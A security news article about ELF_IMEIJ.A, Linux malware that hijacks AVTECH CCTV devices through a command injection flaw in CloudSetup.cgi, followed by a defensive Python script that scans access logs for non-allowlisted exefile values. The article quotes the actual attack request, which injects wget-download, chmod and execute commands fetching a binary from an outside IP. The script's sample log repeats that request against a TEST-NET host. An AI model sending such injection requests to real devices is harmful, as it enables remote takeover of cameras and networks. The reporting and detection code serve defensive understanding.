A new form of Linux malware is hijacking Internet of Things (IoT) devices made by one vendor by exploiting a common gateway interface (CGI) vulnerability.
The ARM malware, detected by security software firm Trend Micro as "ELF_IMEIJ.A," arrives in requests for information (RFI) in CGI bin scripts. Upon delivery, the remote attacker sends the following request to random IP addresses:
POST /cgi-bin/supervisor/CloudSetup.cgi?exefile=wget -O /tmp/Arm1 http://192.154.108.2:8080/Arm1;chmod 0777 /tmp/Arm1;/tmp/Arm1; HTTP/1.1
Why, you might ask?
ELF_IMEIJ.A is looking to exploit an authenticated command injection vulnerability in devices made by AVTECH, a CCTV manufacturer, that specifically support CloudSetup.CGI.
Researchers at Search-Lab first discovered this vulnerability (along with several others) back in October 2015.
The problem is that there is no whitelist-based checking or verification of the exefile parameter of CloudSetup.cgi, which specifies the system command to be executed. This bug therefore allows attackers to execute arbitrary commands with root privileges.
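As an added example (not from the Trend Micro write-up or AVTECH), the following script applies the missing check from the defender's side: it scans web-server access logs for CloudSetup.cgi requests and flags any exefile value that is not on an allowlist or that carries shell metacharacters. The allowlist entry, the log format and the log lines (with TEST-NET addresses) are constructed for the example.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Assumed allowlist of commands CloudSetup.cgi may legitimately run.
# Constructed for this example; it is not AVTECH's real list.
ALLOWED_EXEFILES = {"/usr/bin/cloudsetup"}

# Characters that let one value carry several commands or redirections.
SHELL_META = re.compile(r"[;&|`$<>\n]|\s")

# Common-log-format request field: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Constructed sample log lines (TEST-NET addresses, not real traffic).
SAMPLE_LOG = """\
198.51.100.7 - - [12/Mar/2017:10:01:02 +0000] "POST /cgi-bin/supervisor/CloudSetup.cgi?exefile=wget%20-O%20/tmp/Arm1%20http://203.0.113.5:8080/Arm1;chmod%200777%20/tmp/Arm1;/tmp/Arm1; HTTP/1.1" 200 512
198.51.100.8 - - [12/Mar/2017:10:02:10 +0000] "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=/usr/bin/cloudsetup HTTP/1.1" 200 88
198.51.100.9 - - [12/Mar/2017:10:03:44 +0000] "GET /index.html HTTP/1.1" 200 1024
198.51.100.10 - - [12/Mar/2017:10:04:00 +0000] "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=%2Fbin%2Fbusybox HTTP/1.1" 200 40
"""


def exefile_values(target):
    """Return every exefile= value in the request target, URL-decoded once."""
    values = []
    for pair in urlsplit(target).query.split("&"):
        key, _, value = pair.partition("=")
        if unquote_plus(key) == "exefile":
            values.append(unquote_plus(value))
    return values


def scan_log(text):
    """Return (client_ip, decoded exefile, reason) for each request failing the allowlist."""
    findings = []
    for line in text.splitlines():
        m = REQUEST_RE.search(line)
        if not m or "cloudsetup.cgi" not in m.group("target").lower():
            continue
        client_ip = line.split(" ", 1)[0]
        for value in exefile_values(m.group("target")):
            if value in ALLOWED_EXEFILES:
                continue
            reason = "shell metacharacters" if SHELL_META.search(value) else "not on allowlist"
            findings.append((client_ip, value, reason))
    return findings


if __name__ == "__main__":
    for client_ip, value, reason in scan_log(SAMPLE_LOG):
        print(f"{client_ip}: exefile={value!r} ({reason})")
```

The same allowlist test is what the CGI handler itself should apply before passing exefile to a shell; rejecting anything outside the allowlist closes the injection regardless of which metacharacters an attacker tries.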
Learn more / En savoir plus / Mehr erfahren:
http://www.scoop.it/t/securite-pc-et-internet/?&tag=Linux
http://www.scoop.it/t/securite-pc-et-internet/?&tag=iot